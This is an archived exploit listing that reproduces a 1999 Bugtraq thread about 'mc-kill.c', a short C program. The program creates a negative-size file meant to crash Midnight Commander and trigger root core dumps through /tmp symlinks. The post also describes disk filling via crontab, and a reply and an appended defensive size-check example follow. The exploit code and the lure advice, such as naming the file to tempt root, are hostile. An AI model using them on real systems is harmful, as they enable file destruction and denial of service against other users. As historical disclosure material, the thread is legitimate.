
mc-kill.c

Posted Aug 17, 1999

Yet another bug in Midnight Commander 4.xx - this security hole allows a local user to potentially gain root privileges due to improper handling of negative file sizes by MC and the resulting core dumps.

tags | exploit, local, root
SHA-256 | d9be9334ccae908006a722bfc3d2c16782d3e46589d80e3bcd06ea5519e5cd55

Date: Thu, 15 Apr 1999 06:16:08 -0000
From: Maurycy Prodeus <z33d@LIGHTING.ML.ORG>
To: BUGTRAQ@netspace.org
Subject: Large size file and Midnight/bug in crontab with this file

Hello ...
*******************************************************************************
*
* I. -= Midnight small buf =-
*
* II. -= Large size file - you can fill disk too with crontab ( Michal
* Zalewski found this )
*
*******************************************************************************

I.

This time I found another bug in Midnight Commander 4.xx [ I used 4.1.33 ;)] ...
We can make a Segmentation Fault and if root doesn't lock this, it causes
Core Dumping ... of course we just make some file in /tmp (?) and if root
reads this file ... his mc creates a core ... yeesss we can make a symlink to
any file in the system ... and this file will be totally destroyed!
Together with "Social Engineering", it is dangerous. [ filename may be for example:
hacker.tools or sth. ]
What file must we create?
One with a negative size, but really it is a very large size ;-) ( very strange
that even in kernel 2.2.5 it is possible )

Quick test : Run this program and next run mc and try to read [ F3 of course
and for example PageDown ] the file which was created by mc-kill ...

--------- mc-kill.c ------------

#include <fcntl.h>      /* open, O_RDWR, O_CREAT */
#include <stdio.h>
#include <stdlib.h>     /* exit */
#include <sys/stat.h>   /* fchmod */
#include <unistd.h>     /* ftruncate, fsync, close */
#define size -900000    /* negative length handed to ftruncate() */

int main(int argc, char *argv[]) {
    int i;
    if (argc < 2) {
        printf("\nUSAGE : %s filename[and path] \n\n", argv[0]);
        exit(0);
    }
    i = open(argv[1], O_RDWR | O_CREAT, 0600);
    if (i < 0) {
        perror("open");
        exit(1);
    }
    fchmod(i, 0666);
    /* On 2.2-era kernels this set the inode size to -900000; current kernels
       reject a negative length with EINVAL, which is reported here. */
    if (ftruncate(i, size) < 0)
        perror("ftruncate");
    fsync(i);
    close(i);
    return 0;
}
------------ end of mc-kill.c ---------------

SOLUTION

You NEVER read strange files in MC ...:-)
hmmm seriously : lcamtuf [ http://dione.ids.pl ] wrote a kernel module which
does not allow creating symlinks in /tmp ...

II.

If you use the above program ( or /dev/zero :-) ) you may fill a partition ...
When crontab is reading a file, it creates a temp in /var/spool/cron/ ( non-root
can't even read this - lcamtuf ) But, if it doesn't finish then it doesn't
delete this temp file ... OK. So, we must give crontab a file with "infinite"
size.

Example : crontab -file-made-by-mc-kill


SOLUTION

It isn't very dangerous.




*******************************************************************************

z33d email : z33d@lighting.ml.org www : z33d.lighting.ml.org

If no rational optimal strategy exists, the optimal strategy
is a random strategy ...
- unknown -

---------------------------------------------------------------------------------

Date: Thu, 15 Apr 1999 21:06:42 +0200
From: Mixter <mixter@POPMAIL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Large size file and Midnight/bug in crontab with this file

On Thu, 15 Apr 1999, Maurycy Prodeus wrote:

> With negative size , but really it is a very large size ;-) ( very strange
> that even in kernel 2.2.5 it is posible )

That program you wrote is very scary :)
Any user can create files on any kind of partition with a
"negative" size (i.e. with wrong file structure information).
IMO, this is a problem of a Linux x86 kernel instruction..

ftruncate() :
movl %ebx,%edx
movl 0x8(%esp,1),%ecx
movl 0x4(%esp,1),%ebx
movl $0x5d,%eax
int $0x80
movl %edx,%ebx
cmpl $0xfffff001,%eax
jae 0x804ccf0 <__syscall_error>
ret

This is a sample interrupt which truncates a file belonging to
a file descriptor to any size, including negative, unchecked...
Doing this on an EXT2 fs will get you the error:
EXT2-fs warning (device 03:03): ext2_getblk: block < 0
Any further write access causes the same error... I think
that a lot of programs are not prepared for "negative"-size files
and could encounter race conditions, panics, segfaults with this.
The ability to create such files should be disabled in further
Linux kernel releases (anyone tried this on BSD, SunOS etc. yet?).

Mixter
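As an added example (not part of either post, and not MC's own code): the size validation a file viewer could run before it ever uses st_size as a buffer length or offset, covering the negative-size case from section I and Mixter's point that programs are not prepared for such files. The function names, the 64 MiB cap and the sparse heuristic are my own assumptions.

```c
/* Added example, not from the original thread: classify a file's reported
 * size before trusting it. Names and the size cap are assumptions. */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

enum size_verdict { SIZE_OK, SIZE_NEGATIVE, SIZE_TOO_LARGE, SIZE_SPARSE };

/* Largest file the viewer will hold in memory; assumed policy value. */
#define VIEWER_MAX_BYTES ((off_t)64 * 1024 * 1024)

/* size   : st_size as the C library returns it (signed off_t)
 * blocks : st_blocks in 512-byte units, used to spot a nominal size with
 *          (almost) no storage behind it: sparse file or bogus metadata. */
enum size_verdict check_file_size(off_t size, blkcnt_t blocks)
{
    if (size < 0)                     /* the mc-kill case */
        return SIZE_NEGATIVE;
    if (size > VIEWER_MAX_BYTES)      /* never allocate st_size bytes blindly */
        return SIZE_TOO_LARGE;
    off_t allocated = (off_t)blocks * 512;
    if (size >= ((off_t)1 << 20) && allocated < size / 2)
        return SIZE_SPARSE;           /* readable, but do not rely on EOF */
    return SIZE_OK;
}

/* Wrapper over stat(2): returns a size_verdict, or -1 if stat() fails. */
int check_path(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (int)check_file_size(st.st_size, st.st_blocks);
}

int main(int argc, char *argv[])
{
    static const char *names[] = { "ok", "negative size", "too large",
                                   "sparse or bogus size" };
    if (argc < 2) {
        fprintf(stderr, "usage: %s file\n", argv[0]);
        return 2;
    }
    int v = check_path(argv[1]);
    if (v < 0) { perror("stat"); return 2; }
    printf("%s: %s\n", argv[1], names[v]);
    return v == SIZE_OK ? 0 : 1;
}
```

Run it against a file made by mc-kill: on a kernel that still honoured the negative length it reports "negative size", and a viewer that checks this before seeking or allocating has nothing left to crash on.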
